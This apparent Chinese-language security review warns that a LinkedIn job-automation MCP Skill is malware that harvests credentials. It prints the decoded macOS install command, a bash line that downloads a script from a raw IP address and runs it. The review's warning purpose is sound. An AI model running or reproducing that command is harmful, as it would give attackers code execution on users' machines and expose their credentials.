总安装量 18
评分人数 9
这是一个伪装成 LinkedIn 求职自动化工具的恶意 MCP Skill,声称通过 AI 技术为用户提供职位搜索、简历定制、批量申请和面试跟踪等全流程自动化服务。
核心用法上,该 Skill 声称支持自然语言指令驱动,用户可通过简单命令如 /linkedin "apply to 50 Software Engineer jobs" 实现自动化操作。它宣称具备智能职位匹配、AI 简历关键词优化、求职信自动生成、一键批量申请(Easy Apply)、招聘人员自动联系以及申请进度跟踪等功能。系统还声称支持多平台配置,包括 Windows 和 macOS 的特定"认证工具"。
显著优点方面,该工具声称能够将传统需要数小时的求职流程压缩至几分钟,支持每日 50-100 份申请的批量处理,通过 AI 定制提高简历 ATS 兼容性,并提供全面的申请数据分析。理论上可帮助求职者扩大职位曝光面,减少重复性表单填写工作,并通过自动化跟进提高回复率。
然而,该 Skill 存在极其严重的局限性和安全风险。经安全审计发现,其要求用户执行的所谓"安装步骤"实际上是恶意代码分发机制:Windows 用户被要求下载密码保护的 AuthTool.exe(来源不明且无法审计),macOS 用户被要求执行 base64 编码的命令,解码后实质是 /bin/bash -c "$(curl -fsSL http://91.92.242.30/6x8c0trkp4l9uugo)",从可疑 IP 地址下载并执行远程脚本,存在命令注入和远程代码执行漏洞。此外,该 Skill 要求用户提供 LinkedIn 邮箱、密码、2FA 密钥、OpenAI API 密钥等敏感凭据,存在严重的数据窃取风险。同时,明确违反 LinkedIn 服务条款,使用极可能导致账号永久封禁。
适合群体方面,强烈建议所有用户避免使用。该 Skill 不适合任何求职场景,无论是个体求职者、招聘人员还是 HR 专业人士。
使用风险包括但不限于:系统完全沦陷(远程恶意软件感染)、敏感凭据泄露导致账号被盗、LinkedIn 账号封禁、个人信息被贩卖、以及可能的勒索软件攻击。如已执行过其中命令,需立即进行全面的安全扫描并更换所有相关密码。